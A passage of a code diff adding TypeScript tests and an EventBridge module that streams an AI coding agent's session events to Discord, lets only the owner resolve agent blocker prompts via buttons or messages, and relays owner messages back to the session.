+ * + * Uses mock SessionManager (EventEmitter), mock ChannelManager, + * mock Discord Client, and mock Logger to test event wiring, + * blocker handling, conversation relay, and cleanup. + */ + +import { describe, it, mock } from 'node:test'; +import assert from 'node:assert/strict'; +import { EventEmitter } from 'node:events'; +import { EventBridge } from './event-bridge.js'; +import type { EventBridgeOptions, BridgeClient } from './event-bridge.js'; +import type { PendingBlocker, ManagedSession, DaemonConfig, SessionStatus } from './types.js'; +import type { SdkAgentEvent, RpcClient, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; + +// --------------------------------------------------------------------------- +// Mock factories +// --------------------------------------------------------------------------- + +function createMockLogger() { + return { + debug: mock.fn(() => {}), + info: mock.fn(() => {}), + warn: mock.fn(() => {}), + error: mock.fn(() => {}), + }; +} + +function createMockChannelManager() { + const sentMessages: unknown[] = []; + const mockChannel = { + id: 'ch-123', + send: mock.fn(async (_payload: unknown) => { + sentMessages.push(_payload); + return { id: 'msg-1' }; + }), + createMessageComponentCollector: mock.fn((_opts?: unknown) => { + const collector = new EventEmitter() as EventEmitter & { stop: (reason?: string) => void }; + collector.stop = (reason?: string) => collector.emit('end', [], reason ?? 
'manual'); + return collector; + }), + }; + return { + createProjectChannel: mock.fn(async (_dir: string) => mockChannel), + _channel: mockChannel, + _sentMessages: sentMessages, + }; +} + +function createMockClient(): BridgeClient & EventEmitter { + const emitter = new EventEmitter(); + const dmSendFn = mock.fn(async () => ({})); + const fetchFn = mock.fn(async (_id: string) => ({ send: dmSendFn })); + (emitter as unknown as Record).users = { fetch: fetchFn }; + return Object.assign(emitter, { + users: { fetch: fetchFn }, + _dmSend: dmSendFn, + }) as unknown as BridgeClient & EventEmitter; +} + +function createMockSessionManager() { + const sm = new EventEmitter() as EventEmitter & { + getSession: ReturnType; + resolveBlocker: ReturnType; + }; + sm.getSession = mock.fn((_id: string) => undefined as ManagedSession | undefined); + sm.resolveBlocker = mock.fn(async (_sid: string, _resp: string) => {}); + return sm; +} + +function createMockSession(overrides?: Partial): ManagedSession { + return { + sessionId: 'sess-1', + projectDir: '/test/project', + projectName: 'project', + status: 'running' as SessionStatus, + client: { + steer: mock.fn(async (_msg: string) => {}), + prompt: mock.fn(async () => ({})), + } as unknown as RpcClient, + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + ...overrides, + }; +} + +const DEFAULT_CONFIG: DaemonConfig = { + discord: { + token: 'test-token', + guild_id: 'guild-1', + owner_id: 'owner-1', + dm_on_blocker: false, + }, + projects: { scan_roots: [] }, + log: { file: '/tmp/test.log', level: 'debug', max_size_mb: 10 }, +}; + +function buildBridge(overrides?: Partial) { + const sessionManager = createMockSessionManager(); + const channelManager = createMockChannelManager(); + const client = createMockClient(); + const logger = createMockLogger(); + + const opts: EventBridgeOptions = { + sessionManager: sessionManager as unknown as 
EventBridgeOptions['sessionManager'], + channelManager: channelManager as unknown as EventBridgeOptions['channelManager'], + client, + config: DEFAULT_CONFIG, + logger: logger as unknown as EventBridgeOptions['logger'], + ownerId: 'owner-1', + ...overrides, + }; + + const bridge = new EventBridge(opts); + return { bridge, sessionManager, channelManager, client, logger }; +} + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- +const tick = () => new Promise((r) => setTimeout(r, 30)); + +function mockFn(obj: unknown): { mock: { callCount(): number; calls: Array<{ arguments: unknown[]; result?: unknown }> } } { + return obj as { mock: { callCount(): number; calls: Array<{ arguments: unknown[]; result?: unknown }> } }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('EventBridge', () => { + describe('lifecycle', () => { + it('start() subscribes to session manager events and messageCreate', () => { + const { bridge, sessionManager, client } = buildBridge(); + bridge.start(); + assert.ok(sessionManager.listenerCount('session:started') > 0); + assert.ok(sessionManager.listenerCount('session:event') > 0); + assert.ok(sessionManager.listenerCount('session:blocked') > 0); + assert.ok(sessionManager.listenerCount('session:completed') > 0); + assert.ok(sessionManager.listenerCount('session:error') > 0); + assert.ok(client.listenerCount('messageCreate') > 0); + }); + + it('stop() unsubscribes from all events and clears mappings', async () => { + const { bridge, sessionManager, client } = buildBridge(); + bridge.start(); + await bridge.stop(); + assert.equal(sessionManager.listenerCount('session:started'), 0); + assert.equal(sessionManager.listenerCount('session:event'), 0); + 
assert.equal(sessionManager.listenerCount('session:blocked'), 0); + assert.equal(sessionManager.listenerCount('session:completed'), 0); + assert.equal(sessionManager.listenerCount('session:error'), 0); + assert.equal(client.listenerCount('messageCreate'), 0); + }); + + it('start() is idempotent', () => { + const { bridge, sessionManager } = buildBridge(); + bridge.start(); + bridge.start(); + assert.equal(sessionManager.listenerCount('session:started'), 1); + }); + + it('getVerbosityManager() returns a VerbosityManager', () => { + const { bridge } = buildBridge(); + const vm = bridge.getVerbosityManager(); + assert.ok(vm); + assert.equal(typeof vm.shouldShow, 'function'); + }); + }); + + describe('session:started → channel creation + welcome embed', () => { + it('creates channel and batcher', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + assert.equal(mockFn(channelManager.createProjectChannel).mock.callCount(), 1); + }); + + it('logs error and skips when channel creation fails', async () => { + const failingCm = { + createProjectChannel: mock.fn(async () => { throw new Error('API error'); }), + }; + const { bridge, sessionManager, logger } = buildBridge({ + channelManager: failingCm as unknown as EventBridgeOptions['channelManager'], + }); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + assert.ok(mockFn(logger.error).mock.callCount() > 0); + }); + }); + + describe('session:event → format + verbosity filter + enqueue', () => { + it('formats event and enqueues to batcher (no errors)', async () => { + const { bridge, sessionManager, logger } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: 
'/test/project', projectName: 'my-project', + }); + await tick(); + + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent, + }); + await tick(); + // No errors + assert.equal(mockFn(logger.error).mock.callCount(), 0); + }); + + it('filters events based on verbosity', async () => { + const { bridge, sessionManager, channelManager, logger } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + // Set quiet mode + bridge.getVerbosityManager().setLevel('ch-123', 'quiet'); + + // cost_update filtered in quiet + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'cost_update', cumulativeCost: 1.5 } as SdkAgentEvent, + }); + await tick(); + // tool_execution_start filtered in quiet + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent, + }); + await tick(); + assert.equal(mockFn(logger.error).mock.callCount(), 0); + }); + }); + + describe('session:blocked → blocker embed + buttons + optional DM', () => { + it('sends blocker embed and creates collector for confirm', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Continue?', + event: { id: 'blocker-1', method: 'confirm', message: 'Continue?' 
} as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + assert.ok(mockFn(channelManager._channel.createMessageComponentCollector).mock.callCount() > 0); + }); + + it('sends DM when dm_on_blocker is configured', async () => { + const config: DaemonConfig = { + ...DEFAULT_CONFIG, + discord: { ...DEFAULT_CONFIG.discord!, dm_on_blocker: true }, + }; + const client = createMockClient(); + const { bridge, sessionManager } = buildBridge({ config, client }); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'input', message: 'Enter API key', + event: { id: 'blocker-1', method: 'input' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const usersFetch = (client as unknown as Record).users.fetch; + assert.equal(mockFn(usersFetch).mock.callCount(), 1); + }); + + it('does not send DM when dm_on_blocker is false', async () => { + const client = createMockClient(); + const { bridge, sessionManager } = buildBridge({ client }); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'input', message: 'Enter value', + event: { id: 'blocker-1', method: 'input' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const usersFetch = (client as unknown as Record).users.fetch; + assert.equal(mockFn(usersFetch).mock.callCount(), 0); + }); + 
}); + + describe('button collector → resolveBlocker', () => { + it('resolves blocker on button click from authorized user', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Confirm?', + event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls; + assert.ok(collectorCalls.length > 0); + const collector = collectorCalls[0]!.result as EventEmitter; + + const mockInteraction = { + customId: 'blocker:blocker-1:confirm:true', + user: { id: 'owner-1' }, + update: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + collector.emit('collect', mockInteraction); + await tick(); + + assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 1); + const args = mockFn(sessionManager.resolveBlocker).mock.calls[0]!.arguments; + assert.equal(args[0], 'sess-1'); + assert.equal(args[1], 'true'); + }); + + it('rejects button click from unauthorized user', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Confirm?', + event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await 
tick(); + + const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls; + const collector = collectorCalls[0]!.result as EventEmitter; + + const mockInteraction = { + customId: 'blocker:blocker-1:confirm:true', + user: { id: 'stranger-99' }, + update: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + collector.emit('collect', mockInteraction); + await tick(); + + assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 0); + assert.equal(mockFn(mockInteraction.reply).mock.callCount(), 1); + }); + + it('posts error when resolveBlocker throws', async () => { + const { bridge, sessionManager, channelManager } = buildBridge(); + sessionManager.resolveBlocker = mock.fn(async () => { throw new Error('No pending blocker'); }); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const blocker: PendingBlocker = { + id: 'blocker-1', method: 'confirm', message: 'Confirm?', + event: { id: 'blocker-1', method: 'confirm' } as RpcExtensionUIRequest, + }; + sessionManager.emit('session:blocked', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', blocker, + }); + await tick(); + + const collectorCalls = mockFn(channelManager._channel.createMessageComponentCollector).mock.calls; + const collector = collectorCalls[0]!.result as EventEmitter; + + const mockInteraction = { + customId: 'blocker:blocker-1:confirm:true', + user: { id: 'owner-1' }, + update: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + collector.emit('collect', mockInteraction); + await tick(); + + assert.equal(mockFn(mockInteraction.reply).mock.callCount(), 1); + const replyArg = mockFn(mockInteraction.reply).mock.calls[0]!.arguments[0] as Record; + assert.ok(String(replyArg.content).includes('Failed to resolve')); + }); + }); + + describe('messageCreate relay', () => { + it('relays message 
to session steer when no pending blocker', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const msg = { + author: { id: 'owner-1', bot: false }, + channelId: 'ch-123', + content: 'check the test results', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + client.emit('messageCreate', msg); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 1); + assert.equal(mockFn(session.client.steer).mock.calls[0]!.arguments[0], 'check the test results'); + }); + + it('resolves blocker via relay for input method', async () => { + const blocker: PendingBlocker = { + id: 'blocker-2', method: 'input', message: 'Enter value', + event: { id: 'blocker-2', method: 'input' } as RpcExtensionUIRequest, + }; + const session = createMockSession({ pendingBlocker: blocker, status: 'blocked' }); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const msg = { + author: { id: 'owner-1', bot: false }, + channelId: 'ch-123', + content: 'my-api-key-value', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + client.emit('messageCreate', msg); + await tick(); + + assert.equal(mockFn(sessionManager.resolveBlocker).mock.callCount(), 1); + assert.equal(mockFn(sessionManager.resolveBlocker).mock.calls[0]!.arguments[1], 'my-api-key-value'); + }); + + it('ignores bot messages', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = 
mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + client.emit('messageCreate', { + author: { id: 'bot-1', bot: true }, + channelId: 'ch-123', + content: 'automated', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 0); + }); + + it('ignores messages in non-project channels', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + client.emit('messageCreate', { + author: { id: 'owner-1', bot: false }, + channelId: 'random-ch-999', + content: 'hello', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 0); + }); + + it('ignores messages from unauthorized users', async () => { + const session = createMockSession(); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + client.emit('messageCreate', { + author: { id: 'stranger-99', bot: false }, + channelId: 'ch-123', + content: 'hack the planet', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }); + await tick(); + + assert.equal(mockFn(session.client.steer).mock.callCount(), 0); + }); + + it('posts error when steer fails', async () => { + const session = createMockSession(); + (session.client as unknown as Record).steer = mock.fn(async () => { + throw new Error('session dead'); + }); + const { bridge, sessionManager, client } = buildBridge(); + sessionManager.getSession = mock.fn(() => session); + 
bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + const msg = { + author: { id: 'owner-1', bot: false }, + channelId: 'ch-123', + content: 'try this', + react: mock.fn(async () => {}), + reply: mock.fn(async () => {}), + }; + client.emit('messageCreate', msg); + await tick(); + + assert.equal(mockFn(msg.reply).mock.callCount(), 1); + }); + }); + + describe('session:completed → cleanup', () => { + it('posts completion embed and cleans up', async () => { + const { bridge, sessionManager, logger } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + sessionManager.emit('session:completed', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + // After cleanup, events for this session are silently ignored + sessionManager.emit('session:event', { + sessionId: 'sess-1', projectDir: '/test/project', + event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent, + }); + await tick(); + assert.equal(mockFn(logger.error).mock.callCount(), 0); + }); + }); + + describe('session:error → cleanup', () => { + it('posts error embed and cleans up', async () => { + const { bridge, sessionManager, logger } = buildBridge(); + bridge.start(); + + sessionManager.emit('session:started', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', + }); + await tick(); + + sessionManager.emit('session:error', { + sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', error: 'Process crashed', + }); + await tick(); + + const infoCalls = mockFn(logger.info).mock.calls; + assert.ok( + infoCalls.some((c) => String(c.arguments[0]).includes('session error')), + ); + }); + }); +}); diff --git a/packages/daemon/src/event-bridge.ts 
b/packages/daemon/src/event-bridge.ts new file mode 100644 index 000000000..8df4dfd4e --- /dev/null +++ b/packages/daemon/src/event-bridge.ts @@ -0,0 +1,494 @@ +/** + * event-bridge.ts — Orchestrator wiring SessionManager events through + * formatter → batcher → Discord channels. + * + * Handles: + * - Session lifecycle → Discord channel creation and cleanup + * - Event streaming → format + verbosity filter + batcher + * - Blocker resolution → interactive buttons + text relay + * - Conversation relay → Discord messages forwarded to GSD sessions + * - DM backup → owner gets DM on blocker when dm_on_blocker configured + */ + +import type { Client, Message, TextChannel, MessageComponentInteraction } from 'discord.js'; +import { EmbedBuilder, ComponentType } from 'discord.js'; +import type { SdkAgentEvent } from '@gsd-build/rpc-client'; +import type { Logger } from './logger.js'; +import type { DaemonConfig, PendingBlocker } from './types.js'; +import type { SessionManager } from './session-manager.js'; +import type { ChannelManager } from './channel-manager.js'; +import { MessageBatcher } from './message-batcher.js'; +import { VerbosityManager } from './verbosity.js'; +import { + formatEvent, + formatBlocker, + formatSessionStarted, + formatError, + formatCompletion, +} from './event-formatter.js'; +import { isAuthorized } from './discord-bot.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +/** Minimal interface for a Discord client — extracted for testability. */ +export interface BridgeClient { + on(event: 'messageCreate', listener: (message: Message) => void): void; + off(event: 'messageCreate', listener: (message: Message) => void): void; + users: { fetch(id: string): Promise<{ send(opts: unknown): Promise }> }; +} + +/** Options for creating an EventBridge. 
*/ +export interface EventBridgeOptions { + sessionManager: SessionManager; + channelManager: ChannelManager; + client: BridgeClient; + config: DaemonConfig; + logger: Logger; + ownerId: string; +} + +// --------------------------------------------------------------------------- +// Collector timeout +// --------------------------------------------------------------------------- + +const BLOCKER_COLLECTOR_TIMEOUT_MS = 24 * 60 * 60 * 1000; // 24 hours + +// --------------------------------------------------------------------------- +// EventBridge +// --------------------------------------------------------------------------- + +export class EventBridge { + private readonly sessionManager: SessionManager; + private readonly channelManager: ChannelManager; + private readonly client: BridgeClient; + private readonly config: DaemonConfig; + private readonly logger: Logger; + private readonly ownerId: string; + + /** sessionId → channelId */ + private readonly sessionToChannel = new Map(); + /** channelId → sessionId */ + private readonly channelToSession = new Map(); + /** sessionId → MessageBatcher */ + private readonly batchers = new Map(); + /** sessionId → TextChannel (cached for send operations) */ + private readonly channels = new Map(); + + private readonly verbosity = new VerbosityManager(); + + /** Bound event handlers for cleanup */ + private boundHandlers: { + started: (...args: unknown[]) => void; + event: (...args: unknown[]) => void; + blocked: (...args: unknown[]) => void; + completed: (...args: unknown[]) => void; + error: (...args: unknown[]) => void; + messageCreate: (msg: Message) => void; + } | null = null; + + constructor(opts: EventBridgeOptions) { + this.sessionManager = opts.sessionManager; + this.channelManager = opts.channelManager; + this.client = opts.client; + this.config = opts.config; + this.logger = opts.logger; + this.ownerId = opts.ownerId; + } + + // ----------------------------------------------------------------------- + // 
Lifecycle + // ----------------------------------------------------------------------- + + /** Subscribe to SessionManager events and Discord messageCreate. */ + start(): void { + if (this.boundHandlers) return; // already started + + this.boundHandlers = { + started: (data: unknown) => { + void this.onSessionStarted(data as SessionStartedPayload); + }, + event: (data: unknown) => { + void this.onSessionEvent(data as SessionEventPayload); + }, + blocked: (data: unknown) => { + void this.onSessionBlocked(data as SessionBlockedPayload); + }, + completed: (data: unknown) => { + void this.onSessionCompleted(data as SessionCompletedPayload); + }, + error: (data: unknown) => { + void this.onSessionError(data as SessionErrorPayload); + }, + messageCreate: (msg: Message) => { + void this.handleMessageCreate(msg); + }, + }; + + this.sessionManager.on('session:started', this.boundHandlers.started); + this.sessionManager.on('session:event', this.boundHandlers.event); + this.sessionManager.on('session:blocked', this.boundHandlers.blocked); + this.sessionManager.on('session:completed', this.boundHandlers.completed); + this.sessionManager.on('session:error', this.boundHandlers.error); + this.client.on('messageCreate', this.boundHandlers.messageCreate); + + this.logger.info('event bridge started'); + } + + /** Unsubscribe from all events, destroy batchers, clear mappings. 
*/ + async stop(): Promise { + if (this.boundHandlers) { + this.sessionManager.off('session:started', this.boundHandlers.started); + this.sessionManager.off('session:event', this.boundHandlers.event); + this.sessionManager.off('session:blocked', this.boundHandlers.blocked); + this.sessionManager.off('session:completed', this.boundHandlers.completed); + this.sessionManager.off('session:error', this.boundHandlers.error); + this.client.off('messageCreate', this.boundHandlers.messageCreate); + this.boundHandlers = null; + } + + // Destroy all batchers + const destroyPromises: Promise[] = []; + for (const batcher of this.batchers.values()) { + destroyPromises.push(batcher.destroy()); + } + await Promise.allSettled(destroyPromises); + + this.batchers.clear(); + this.sessionToChannel.clear(); + this.channelToSession.clear(); + this.channels.clear(); + + this.logger.info('event bridge stopped'); + } + + /** Expose the verbosity manager for slash-command integration. */ + getVerbosityManager(): VerbosityManager { + return this.verbosity; + } + + // ----------------------------------------------------------------------- + // SessionManager event handlers + // ----------------------------------------------------------------------- + + private async onSessionStarted(data: SessionStartedPayload): Promise { + const { sessionId, projectDir, projectName } = data; + + try { + const channel = await this.channelManager.createProjectChannel(projectDir); + + // Create batcher with channel.send as the send function + const batcher = new MessageBatcher( + async (payload) => { + await channel.send(payload as Parameters[0]); + }, + this.logger, + ); + batcher.start(); + + // Register bidirectional mapping + this.sessionToChannel.set(sessionId, channel.id); + this.channelToSession.set(channel.id, sessionId); + this.batchers.set(sessionId, batcher); + this.channels.set(sessionId, channel); + + // Post welcome embed + const welcome = formatSessionStarted(projectName); + 
batcher.enqueue(welcome); + + this.logger.info('bridge: session channel created', { + sessionId, + channelId: channel.id, + projectName, + }); + } catch (err) { + // Failure mode: log error, skip streaming for this session + this.logger.error('bridge: channel creation failed', { + sessionId, + projectDir, + error: err instanceof Error ? err.message : String(err), + }); + } + } + + private async onSessionEvent(data: SessionEventPayload): Promise { + const { sessionId, event } = data; + const channelId = this.sessionToChannel.get(sessionId); + if (!channelId) return; // no channel for this session + + // Verbosity filter + const eventType = (event as Record).type as string; + if (!this.verbosity.shouldShow(channelId, eventType)) return; + + const formatted = formatEvent(event, this.ownerId); + const batcher = this.batchers.get(sessionId); + if (batcher) { + batcher.enqueue(formatted); + } + } + + private async onSessionBlocked(data: SessionBlockedPayload): Promise { + const { sessionId, projectName, blocker } = data; + const channel = this.channels.get(sessionId); + if (!channel) return; + + const formatted = formatBlocker(blocker, this.ownerId); + + // Send immediately (bypasses batching for blockers) + const batcher = this.batchers.get(sessionId); + if (batcher) { + await batcher.enqueueImmediate(formatted); + } + + // For select/confirm methods, set up button collector + if (blocker.method === 'select' || blocker.method === 'confirm') { + this.createButtonCollector(sessionId, channel, blocker); + } + + // DM backup + if (this.config.discord?.dm_on_blocker) { + await this.sendBlockerDM(sessionId, projectName, blocker); + } + } + + private async onSessionCompleted(data: SessionCompletedPayload): Promise { + const { sessionId, projectName } = data; + const batcher = this.batchers.get(sessionId); + if (!batcher) return; + + const completion = formatCompletion({ + type: 'execution_complete', + status: 'completed', + } as SdkAgentEvent); + + // Flush through batcher 
then cleanup + batcher.enqueue(completion); + await this.cleanupSession(sessionId); + + this.logger.info('bridge: session completed', { sessionId, projectName }); + } + + private async onSessionError(data: SessionErrorPayload): Promise { + const { sessionId, projectName, error } = data; + const batcher = this.batchers.get(sessionId); + if (!batcher) return; + + const errorEmbed = formatError(sessionId, error); + batcher.enqueue(errorEmbed); + await this.cleanupSession(sessionId); + + this.logger.info('bridge: session error', { sessionId, projectName, error }); + } + + // ----------------------------------------------------------------------- + // Blocker resolution — button collector + // ----------------------------------------------------------------------- + + private createButtonCollector( + sessionId: string, + channel: TextChannel, + blocker: PendingBlocker, + ): void { + // Create a message collector on the channel for button interactions + // We use createMessageComponentCollector on the channel + try { + const collector = channel.createMessageComponentCollector({ + componentType: ComponentType.Button, + time: BLOCKER_COLLECTOR_TIMEOUT_MS, + filter: (interaction: MessageComponentInteraction) => { + return interaction.customId.startsWith(`blocker:${blocker.id}:`); + }, + }); + + collector.on('collect', async (interaction: MessageComponentInteraction) => { + // Auth guard + if (!isAuthorized(interaction.user.id, this.ownerId)) { + await interaction.reply({ + content: '⛔ Only the project owner can respond to blockers.', + ephemeral: true, + }).catch(() => {}); + return; + } + + // Parse customId: blocker:{id}:{method}:{value} + const parts = interaction.customId.split(':'); + const value = parts[3] ?? 
''; + + try { + await this.sessionManager.resolveBlocker(sessionId, value); + await interaction.update({ + content: `✅ Blocker resolved with: ${value}`, + components: [], + }).catch(() => {}); + collector.stop('resolved'); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('bridge: blocker resolve failed', { sessionId, error: errMsg }); + await interaction.reply({ + content: `❌ Failed to resolve blocker: ${errMsg}`, + ephemeral: true, + }).catch(() => {}); + } + }); + + collector.on('end', (_collected, reason) => { + if (reason === 'time') { + // Timeout: edit to show expired + this.logger.info('bridge: blocker collector timed out', { sessionId, blockerId: blocker.id }); + // Post a new message indicating expiry — editing original may fail + const batcher = this.batchers.get(sessionId); + if (batcher) { + batcher.enqueue({ + content: `⏰ Blocker response timed out after 24h. Re-posting...`, + embed: new EmbedBuilder() + .setColor(0xf1c40f) + .setTitle('⏰ Blocker Expired') + .setDescription(blocker.message) + .setTimestamp(), + }); + } + } + }); + } catch (err) { + this.logger.error('bridge: collector creation failed', { + sessionId, + error: err instanceof Error ? 
err.message : String(err), + }); + } + } + + // ----------------------------------------------------------------------- + // DM backup + // ----------------------------------------------------------------------- + + private async sendBlockerDM( + sessionId: string, + projectName: string, + blocker: PendingBlocker, + ): Promise { + try { + const user = await this.client.users.fetch(this.ownerId); + await user.send({ + content: `⚠️ **Blocker** in **${projectName}** — ${blocker.message}\n\nRespond in the project channel.`, + }); + this.logger.debug('bridge: DM sent for blocker', { sessionId, blockerId: blocker.id }); + } catch (err) { + // DM failure is non-fatal — channel message is the primary path + this.logger.warn('bridge: DM send failed', { + sessionId, + error: err instanceof Error ? err.message : String(err), + }); + } + } + + // ----------------------------------------------------------------------- + // Conversation relay — Discord → GSD + // ----------------------------------------------------------------------- + + private async handleMessageCreate(message: Message): Promise { + // Filter: bot messages + if (message.author.bot) return; + + // Filter: must be in a project channel + const sessionId = this.channelToSession.get(message.channelId); + if (!sessionId) return; + + // Filter: must be authorized + if (!isAuthorized(message.author.id, this.ownerId)) return; + + const session = this.sessionManager.getSession(sessionId); + if (!session) return; + + // If session has a pending blocker with input/editor method, resolve it + if (session.pendingBlocker && (session.pendingBlocker.method === 'input' || session.pendingBlocker.method === 'editor')) { + try { + await this.sessionManager.resolveBlocker(sessionId, message.content); + await message.react('✅').catch(() => {}); + this.logger.info('bridge: blocker resolved via relay', { + sessionId, + method: session.pendingBlocker.method, + }); + } catch (err) { + const errMsg = err instanceof Error ? 
err.message : String(err); + this.logger.error('bridge: relay blocker resolve failed', { sessionId, error: errMsg }); + await message.reply(`❌ Failed to resolve blocker: ${errMsg}`).catch(() => {}); + } + return; + } + + // Otherwise, relay the message to the GSD session + // Use steer() when running (injects mid-turn), prompt() otherwise (starts new turn) + try { + if (session.status === 'running') { + await session.client.steer(message.content); + } else { + await session.client.prompt(message.content); + } + await message.react('📨').catch(() => {}); + this.logger.info('bridge: message relayed to session', { + sessionId, + method: session.status === 'running' ? 'steer' : 'prompt', + }); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('bridge: relay failed', { sessionId, error: errMsg }); + await message.reply(`❌ Failed to relay message: ${errMsg}`).catch(() => {}); + } + } + + // ----------------------------------------------------------------------- + // Cleanup + // ----------------------------------------------------------------------- + + private async cleanupSession(sessionId: string): Promise { + const batcher = this.batchers.get(sessionId); + if (batcher) { + await batcher.destroy(); + this.batchers.delete(sessionId); + } + + const channelId = this.sessionToChannel.get(sessionId); + if (channelId) { + this.channelToSession.delete(channelId); + } + this.sessionToChannel.delete(sessionId); + this.channels.delete(sessionId); + } +} + +// --------------------------------------------------------------------------- +// Internal event payload types (matching SessionManager emissions) +// --------------------------------------------------------------------------- + +interface SessionStartedPayload { + sessionId: string; + projectDir: string; + projectName: string; +} + +interface SessionEventPayload { + sessionId: string; + projectDir: string; + event: SdkAgentEvent; +} + +interface SessionBlockedPayload { + 
